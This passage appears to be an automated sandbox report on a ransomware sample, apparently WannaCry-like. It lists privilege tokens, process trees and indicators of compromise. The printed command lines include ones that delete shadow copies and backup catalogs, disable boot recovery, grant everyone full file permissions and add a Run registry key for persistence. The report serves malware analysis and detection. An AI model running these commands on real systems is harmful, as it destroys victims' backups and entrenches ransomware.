Token: SeIncBasePriorityPrivilege	1284	WMIC.exe
Token: SeCreatePagefilePrivilege	1284	WMIC.exe
Token: SeBackupPrivilege	1284	WMIC.exe
Token: SeRestorePrivilege	1284	WMIC.exe
Token: SeShutdownPrivilege	1284	WMIC.exe
Token: SeDebugPrivilege	1284	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1284	WMIC.exe
Token: SeRemoteShutdownPrivilege	1284	WMIC.exe
Token: SeUndockPrivilege	1284	WMIC.exe
Token: SeManageVolumePrivilege	1284	WMIC.exe
Token: 33	1284	WMIC.exe
Token: 34	1284	WMIC.exe
Token: 35	1284	WMIC.exe
Token: 36	1284	WMIC.exe
Token: SeBackupPrivilege	444	vssvc.exe
Token: SeRestorePrivilege	444	vssvc.exe
Token: SeAuditPrivilege	444	vssvc.exe
Token: SeTcbPrivilege	400	taskse.exe
Token: SeTcbPrivilege	400	taskse.exe
Token: SeTcbPrivilege	2072	taskse.exe
Token: SeTcbPrivilege	2072	taskse.exe
Token: SeTcbPrivilege	3784	taskse.exe
Token: SeTcbPrivilege	3784	taskse.exe
Token: SeRestorePrivilege	2636	7zFM.exe
Token: 35	2636	7zFM.exe
Token: SeSecurityPrivilege	2636	7zFM.exe
Token: SeDebugPrivilege	4628	GRABBER.EXE
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeTcbPrivilege	4956	taskse.exe
Token: SeTcbPrivilege	4956	taskse.exe
Token: SeTcbPrivilege	4780	taskse.exe
Token: SeTcbPrivilege	4780	taskse.exe
Token: SeTcbPrivilege	776	taskse.exe
Token: SeTcbPrivilege	776	taskse.exe
Token: SeDebugPrivilege	4164	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3576	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
2636	7zFM.exe
2636	7zFM.exe
4056	msedge.exe

Suspicious use of SendNotifyMessage 59 IoCs

pid	Process
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
4056	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
1584	msedge.exe
5040	Client.exe

Suspicious use of SetWindowsHookEx 28 IoCs

pid	Process
3420	@[email protected]
3420	@[email protected]
1648	@[email protected]
1648	@[email protected]
2252	@[email protected]
2252	@[email protected]
1972	@[email protected]
444	mspaint.exe
444	mspaint.exe
444	mspaint.exe
444	mspaint.exe
1796	@[email protected]
1436	@[email protected]
4924	@[email protected]
1312	@[email protected]
3748	@[email protected]
1012	@[email protected]
3940	@[email protected]
776	@[email protected]
324	@[email protected]
1764	@[email protected]
5040	Client.exe
2112	@[email protected]
5072	@[email protected]
3044	@[email protected]
1800	@[email protected]
4956	@[email protected]
3552	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4056 wrote to memory of 2028	4056	msedge.exe	82
PID 4056 wrote to memory of 2028	4056	msedge.exe	82
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 2656	4056	msedge.exe	83
PID 4056 wrote to memory of 3060	4056	msedge.exe	84
PID 4056 wrote to memory of 3060	4056	msedge.exe	84
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85
PID 4056 wrote to memory of 676	4056	msedge.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3976	attrib.exe
1272	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/LuNaTiiiK/Image-Grabber/tree/main/Tools%20priv%C3%A9
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed44d46f8,0x7ffed44d4708,0x7ffed44d4718
  2⤵
  PID:2028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  2⤵
  PID:676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:2240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
  2⤵
  PID:5000
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
  2⤵
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
  2⤵
  PID:776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
  2⤵
  PID:4436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3068 /prefetch:8
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6064 /prefetch:8
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6112 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:540
- C:\Users\Admin\Downloads\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
  "C:\Users\Admin\Downloads\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  PID:1288
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - Views/modifies file attributes
    PID:3976
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4732
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 54071715446848.bat
    3⤵
    PID:3596
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      PID:4888
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - Views/modifies file attributes
    PID:1272
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected] co
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3420
  - - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:4592
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    PID:1800
  - - C:\Users\Admin\Downloads\@[email protected]
      @[email protected] vs
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1648
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        
        PID:4716
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1284
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3832
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:400
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ppcvxtmedh378" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    PID:4280
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ppcvxtmedh378" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
      4⤵
      Adds Run key to start application
      Modifies registry key
      PID:4340
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:2496
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2072
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1972
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:64
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3784
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1436
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4956
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4924
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3236
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4780
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1312
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3932
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:776
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3748
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4956
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:1124
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1012
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:208
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:4260
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3940
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3960
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:4740
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:776
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3596
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:1212
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:324
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:1752
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:1232
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1764
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4740
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:1144
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2112
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4728
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:1884
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5072
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:616
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:712
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3044
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3828
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:4856
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:1800
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:228
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:3052
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4956
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:4604
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:4020
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3552
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:2068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1936 /prefetch:8
  2⤵
  PID:2260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
  2⤵
  PID:4988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
  2⤵
  PID:4192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
